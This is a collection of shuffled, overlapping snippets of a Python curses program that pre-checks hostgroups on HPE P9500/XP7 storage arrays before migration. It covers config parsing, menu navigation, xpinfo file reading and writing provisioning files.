"for hostgroup_name in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name))",
"Precheck DESCRIPTION : Precheck to examine hostgroup is ready for migration AUTHOR :",
"while True: self.window.clear() self.window.refresh() curses.doupdate() ### show the list of xpinfo files ###",
"select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ### consistent_win",
"Menu(object): def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window)",
"while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.display_list): if len(item) >= self.width:",
"= self.window.getmaxyx() self.selection = selection self.hostgroup_summary = [] self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide()",
"name,value in cfg.items(\"instance\"): instance_dict[name.upper()] = int(value) for name,value in cfg.items(\"site\"): site_dict[name.upper()] = value",
"= [] self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] def navigate(self,n):",
"add lines in the slice ### if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode)",
"= window self.heigth,self.width = self.window.getmaxyx() self.title = title self.selection = [] def display(self):",
"self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window = window self.heigth,self.width",
"class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() ### items is",
"= set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def clear(self): del self.consistent[:] self.display() def",
"self.window.addstr(1,2,\"Write provisioning out to file for the consistent HOSTGROUPs ? (Y/n)\") key =",
"row[0] device_name = row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO: got S/N",
"### instantiate boxes ### ######################### for box_name in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if",
"for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] =",
"#key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN",
"CONFIG : xpmig.ini LOG : xpmig_precheck.log TODO : add generate temporary horcm file",
"self.position = 0 self.items = items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position += n if",
"### only add lines in the slice ### if self.slice_start <= index <=",
"def clear(self): self.search_str = \"\" self.display() def get(self): return self.search_str class Consistent(object): def",
"key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN #################################################################################################### def",
"self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.filtered_items):",
"+ \"\\n\") sys.exit(1) if box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg =",
"> 1: sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in",
"define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching this SEARCH",
"len(self.display_list) - 1: self.slice_end = len(self.display_list) - 1 self.slice_start = self.slice_end - self.slice_len",
"{}-{}\".format(self.slice_start,self.slice_end )) elif n > 0: if self.slice_end - self.position < 2 and",
"name,value in cfg.items(\"site\"): site_dict[name.upper()] = value for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value",
"= [] def display(self): self.window.clear() line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x",
"self.slice_end - self.position < 2 and self.slice_end < len(self.xpinfo_file_list) - 1: ### slide",
"if key in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list)",
"in hostgroup_dict: hostgroup_dict[box_name] = set() for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr):",
"if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if key in",
"### refresh & wait ### stdscr.refresh() stdscr.getkey() #################### ### parse config ### ####################",
"ConfigParser() cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in",
"if line >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply =",
"= search def update(self): \"\"\" update the selection items list to match the",
"curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window = window self.selection = selection self.window.keypad(1) self.panel",
"0 elif self.position >= len(self.filtered_items): self.position = len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position",
"<= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif key",
"update items to match search str {}\".format(self.search.get())) self.filtered_items = [x for x in",
"not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display))",
"panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text = text self.reply = \"\" self.update_object = upd_obj def",
"def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() ### show",
"< 0: if self.slice_start >= 1: self.slice_start += n if self.slice_start < 0:",
"curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10) elif",
"key == curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate()",
"write out the ldevs to file ### for box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name):",
"{}, n = {}\".format(self.position,n )) ### adjust slice ### if n < 0:",
"self.window = window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start = 0 self.slice_len =",
"### MAIN #################################################################################################### def main(stdscr): ### clear screen ### stdscr.clear() ### check window",
"self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width =",
"select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name ###",
"panel import re import logging import logging.handlers import copy from ConfigParser import ConfigParser",
"self.heigth,self.width = self.window.getmaxyx() ### items is a dict ### self.items = items self.filtered_items",
"sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if",
"consistent def navigate(self,n): if n < 0: if self.slice_start >= 1: self.slice_start +=",
"{} - {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]:",
"self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice up to {}-{}\".format(self.slice_start,self.slice_end )) elif n > 0:",
"self.slice_start < 0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len elif n",
"len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position = {}, n = {}\".format(self.position,n )) ###",
"line[:self.width-1] ### only add lines in the slice ### if self.slice_start <= index",
"__init__(self,window,selection,consistent,stdscr): self.window = window self.selection = selection self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels()",
"### self.slice_start = 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len self.window.keypad(1)",
"break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list) - 1: break else:",
"to {}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh()",
"logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE",
"= site_dict[box_name] else: err_msg = \"No site defined for box {}, exiting..\".format(box_name) logger.error(err_msg)",
"self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6) self.slice_start = 0 self.slice_end = self.slice_start +",
"self.selection = selection self.hostgroup_summary = [] self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list",
"Add xpinfo file processing CONFIG : xpmig.ini LOG : xpmig_precheck.log TODO : add",
"self.slice_end > len(self.display_list) - 1: self.slice_end = len(self.display_list) - 1 self.slice_start = self.slice_end",
"err_msg = \"No site defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\")",
"### show the list of xpinfo files ### for index,item in enumerate(self.xpinfo_file_list): if",
"- 1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.update()",
"items which fits in the window ### self.slice_start = 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6)",
"self.position < 2 and self.slice_end < len(self.xpinfo_file_list) - 1: ### slide slice down",
"window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start = 0 self.slice_len = 0 self.slice_end",
"navigate(self,n): self.position += n if self.position < 0: self.position = 0 elif self.position",
"### slice is a view on the items which fits in the window",
"= Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent =",
"in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu =",
"in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname",
"self.display_list = [] for box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA",
"items list to match the new search criteria \"\"\" if self.search.get() != \"\":",
"got S/N {} LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr)",
"HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name ### select_item_dict = {} for boxpair_name in",
"found hostgroups to the selection ### for box_name in hostgroup_dict: for hostgroup_name in",
"in enumerate(self.display_list): if len(item) >= self.width: item = item[:self.width-1] if self.slice_start <= index",
"\"\": logger.debug(\"Select_Menu.update :: update items to match search str {}\".format(self.search.get())) self.filtered_items = [x",
"cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict = {} for",
"= [f for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len =",
"if self.position - self.slice_start < 2 and self.slice_start >= 1: ### slide slice",
"- self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice down to {}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top()",
"add lines in the slice ### # logger.debug(\"SelectMenu.display :: about to addstr line",
"== self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}:",
"check window heigth and width ### if curses.COLS < 20 or curses.LINES <",
"in serial_nbr_set: ldev_dict[serial_nbr] = set() ### process the selected xpinfo file ### with",
"window self.heigth,self.width = self.window.getmaxyx() self.title = title self.selection = [] def display(self): self.window.clear()",
"= value try: log_level = cfg.getint(\"log\",\"level\") except: log_level = 30 try: log_size =",
"self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.selection) current_set.add(item) self.selection = list(sorted(current_set))",
"UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B> BACK\",curses.A_BOLD) ### define menu_win ### menu_win",
"to display ### self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start +",
"* linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\")",
"line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items)",
"self.selection = selection self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] self.consistent",
"ldevs to file ### for box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name))",
">= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply = self.window.getstr() ###",
"key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if",
"hostgroup_name in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu",
"self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]:",
"1: self.slice_end += n if self.slice_end > len(self.display_list) - 1: self.slice_end = len(self.display_list)",
"define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define",
"= \"\" self.update_object = upd_obj def display(self): self.panel.top() self.panel.show() self.window.clear() line = \"{}:",
"self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply = self.window.getstr() ### after we received the response",
"self.filtered_items.append(\"exit\") ### slice is a view on the items which fits in the",
"self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN #################################################################################################### def main(stdscr): ### clear screen ###",
"import curses from curses import panel import re import logging import logging.handlers import",
"### ######################### for box_name in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict:",
"hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr)",
"def __init__(self,window,selection,consistent,stdscr): self.window = window self.selection = selection self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide()",
"### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN",
"= panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.items = items self.items.append((\"exit\",\"exit\")) def navigate(self,n):",
"len(self.items): self.position = len(self.items) - 1 def display(self): self.panel.top() self.panel.show() self.window.clear() while True:",
"in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try: log_level = cfg.getint(\"log\",\"level\") except: log_level = 30",
"from curses import panel import re import logging import logging.handlers import copy from",
"== curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10)",
"for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update :: update items to match",
"to file ### for box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with",
"window self.heigth,self.width = self.window.getmaxyx() self.title = title self.search_str = \"\" def display(self): self.window.clear()",
"= \"No HORCM instance nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg +",
"= serialnbr_dict[box_name] else: err_msg = \"No serial nbr defined for box {}, exiting..\".format(box_name)",
"self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.items",
"== curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10)",
"= stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items = [] input_search = InputMenu(menu_win,\"Specify new search string\",search,stdscr)",
"self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def",
"panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1)",
"in enumerate(self.items): if index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL",
"InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window)",
"self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len",
"self.window.getmaxyx() ### fill the list to display ### self.display_list = [] for box_name,hostgroup_name",
"logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\"",
"### FUNCTIONS #################################################################################################### #################################################################################################### ### CLASSES #################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window =",
"clear(self): del self.selection[:] self.display() def get(self): return self.selection class Search(object): def __init__(self,window,title,stdscr): self.window",
"= self.slice_start + self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.display_list):",
"curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0])",
"### start menu ### ##################### curses.wrapper(main) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK ended\") logger.info(\"#\"",
"key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list) - 1: break else: logger.debug(\"XPINFO: start",
"logger.error(\"XPINFO: line too short to be valid, skipping {}\".format(row)) ### translate ldev to",
"5 try: log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir not defined, exiting..\\n\") sys.exit(1)",
"the response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr):",
"self.display_list = [] def navigate(self,n): if n < 0: if self.slice_start >= 1:",
"key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key == curses.KEY_UP: self.navigate(-1)",
"define selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define",
"self.window = window self.heigth,self.width = self.window.getmaxyx() self.selection = selection self.hostgroup_summary = [] self.window.keypad(1)",
"if self.slice_start >= 1: self.slice_start += n if self.slice_start < 0: self.slice_start =",
"self.search_str = search_str self.display() def clear(self): self.search_str = \"\" self.display() def get(self): return",
"= curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item) line =",
"panel.update_panels() self.position = 0 self.selection = selection self.search = search def update(self): \"\"\"",
"in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in config file {}, exiting..\".format(mandatory_section,configfile))",
"self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice up to {}-{}\".format(self.slice_start,self.slice_end )) elif n",
"= consistent self.map_dir = map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self):",
"= window self.heigth,self.width = self.window.getmaxyx() ### items is a dict ### self.items =",
"site defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) box_dict[box_name] =",
"for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try: log_level = cfg.getint(\"log\",\"level\") except: log_level",
"slide slice down to {}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while",
"self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.items = items",
"P9500 TO XP7 MIGRATION PRE-CHECK\") title_win.border() ### define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0)",
"not large enough, exiting ..\\n\") sys.exit(1) ### define title_win ### title_win = stdscr.subwin(3,curses.COLS,0,0)",
"NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ### instantiate boxes ###",
"mode = curses.A_STANDOUT else: mode = curses.A_NORMAL line = \"{}\".format(item) if len(line) >=",
"MAIN #################################################################################################### def main(stdscr): ### clear screen ### stdscr.clear() ### check window heigth",
"os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)]",
"n if self.slice_end > len(self.display_list) - 1: self.slice_end = len(self.display_list) - 1 self.slice_start",
"in site_dict: site = site_dict[box_name] else: err_msg = \"No site defined for box",
"def add(self,item): current_set = set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def clear(self): del",
"self.window.clear() line = \"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line)",
"= line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply = self.window.getstr() ### after we received",
"logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) #########################",
"HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs",
"self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.selection) current_set.add(item) self.selection = list(sorted(current_set)) self.display() def",
"ldev to hostgroup ### for serial_nbr in ldev_dict: box_name = serial_to_name_dict[serial_nbr] if not",
"index <= self.slice_end: # logger.debug(\"SelectMenu.display :: index in slice {} - {}, executing",
"self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window = window self.selection =",
"class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent = consistent self.map_dir = map_dir",
"if self.slice_end > len(self.xpinfo_file_list) - 1: self.slice_end = len(self.xpinfo_file_list) - 1 self.slice_start =",
"sys.exit(1) if box_name in site_dict: site = site_dict[box_name] else: err_msg = \"No site",
"### only add lines in the slice ### # logger.debug(\"SelectMenu.display :: about to",
"{}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for name,value in",
"TITLE : HPE XP7 Migration, Precheck DESCRIPTION : Precheck to examine hostgroup is",
"selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win",
"items self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is a view on the items",
"the ldevs to file ### for box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf =",
"= title self.search_str = \"\" def display(self): self.window.clear() line = \"{}: {}\".format(self.title,self.search_str) if",
"SCROLL DOWN <B> BACK\",curses.A_BOLD) ### define menu_win ### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border()",
"to {}-{}\".format(self.slice_start,self.slice_end )) elif n > 0: if self.slice_end - self.position < 2",
"### now we know what to display ### self.slice_start = 0 self.slice_len =",
">= self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]:",
"#################################################################################################### \"\"\" import curses from curses import panel import re import logging import",
"logging import logging.handlers import copy from ConfigParser import ConfigParser import sys import os",
"self.width: line = line[:self.width-1] ### only add lines in the slice ### #",
":\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start menu ### ##################### curses.wrapper(main) logger.info(\"#\" * linelen) logger.info(\"XPMIG",
"= stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN>",
"= [] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know what to",
"the list of xpinfo files ### for index,item in enumerate(self.xpinfo_file_list): if index ==",
"{} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups by host (hba_wwn) ### select_item_dict = {} for",
"{} box_dict = {} #################################################################################################### ### FUNCTIONS #################################################################################################### #################################################################################################### ### CLASSES #################################################################################################### class",
"xpmig.ini LOG : xpmig_precheck.log TODO : add generate temporary horcm file and daemon",
"to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to consistent",
"for boxpair_name in sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name",
"logger.debug(\"Select_Menu.update :: update items to match search all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start",
"valid, skipping {}\".format(row)) ### translate ldev to hostgroup ### for serial_nbr in ldev_dict:",
"we know what to display ### self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end",
"define key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL",
"0 self.slice_len = 0 self.slice_end = 0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels()",
"FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ### instantiate boxes ### ######################### for box_name",
"panel.update_panels() self.position = 0 self.xpinfo_dir = xpinfo_dir self.selection = selection def update(self): \"\"\"",
"logger.debug(\"Select_Menu.update :: update items to match search str {}\".format(self.search.get())) self.filtered_items = [x for",
"### show hostgroup consistency menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check",
"6) self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position = 0 def",
"= copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position =",
"len(self.filtered_items) - 1: self.slice_end = len(self.filtered_items) - 1 self.slice_start = self.slice_end - self.slice_len",
"XPINFO file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show hostgroup summary",
"translate ldev to hostgroup ### for serial_nbr in ldev_dict: box_name = serial_to_name_dict[serial_nbr] if",
"self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is a view on the items which",
"= {} for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list:",
